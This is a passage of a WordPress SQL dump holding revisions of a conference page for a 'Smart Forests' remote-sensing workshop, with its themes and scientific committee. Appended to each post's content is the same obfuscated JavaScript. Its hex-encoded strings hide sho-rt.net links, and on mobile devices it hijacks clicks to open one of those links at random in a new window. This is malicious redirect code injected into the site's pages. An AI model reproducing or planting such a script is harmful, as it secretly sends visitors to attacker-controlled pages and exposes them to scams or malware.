|\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-08 19:51:16','2022-11-08 19:51:16','',3049,'https://gsw2023.com/?p=3059',0,'revision','',0),
(3060,1,'2022-11-08 19:51:49','2022-11-08 19:51:49','<p>[vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\n<h5><strong>This workshop is jointly organized by</strong></h5>\n<ul>\n<li>\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\n</li>\n<li>\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\n</li>\n<li>\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\n</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2></h2>\n<h2>CO-CHAIRS</h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"58\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the event:</u></strong></h5>\n<ul>\n<li><strong>Advancements in novel sensors, platforms, data generation, and data fusion</strong></li>\n<li><strong>Automation and real-time system operations</strong></li>\n<li><strong>Innovation in robotic operation of sensors, platforms, and AI powered processing technologies</strong></li>\n<li><strong>Machine and deep learning approaches for forest mensuration, reconstruction, and attribute estimation</strong></li>\n<li><strong>New knowledge and understanding about forest functioning processes</strong></li>\n<li><strong>Benchmarking as a mechanism to determine the potential and limitations of remote sensing systems and methods</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee: </u></strong></h5>\n<ul>\n<li><strong>Xinlian Liang, Wuhan University, China</strong></li>\n<li><strong>Yunsheng Wang, Finnish Geospatial Research Institute, Finland</strong></li>\n<li><strong>Francesco Pirotti, <a href=\"https://scholar.google.fi/citations?view_op=view_org&amp;hl=en&amp;org=17347040822771261636\">University of Padova</a>, Italy</strong></li>\n<li><strong>Joanne C. White, Canadian Forest Service, Canada</strong></li>\n<li><strong>Fabian Faßnacht, Freie Universität Berlin, Germany</strong></li>\n<li><strong>Maria Teresa Melis, University of Cagliari, Italy</strong></li>\n<li><strong>Weishu Gong, University of Maryland, College Park, USA</strong></li>\n<li><strong>Megumi Yamashita, Tokyo University of Agriculture and Technology, Japan</strong></li>\n<li><strong>Jaime Hernandez, University of Chile, Chile</strong></li>\n<li><strong>Martin Mokroš, Czech University of Life Sciences Prague, Czech Republic</strong></li>\n<li><strong>Mariana Campos, Finnish Geospatial Research Institute, Finland</strong></li>\n<li><strong>Roberto Pierdicca, Polytechnic University of Marche, Italy</strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-08 19:51:49','2022-11-08 19:51:49','',3049,'https://gsw2023.com/?p=3060',0,'revision','',0),
(3061,1,'2022-11-08 19:53:16','2022-11-08 19:53:16','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 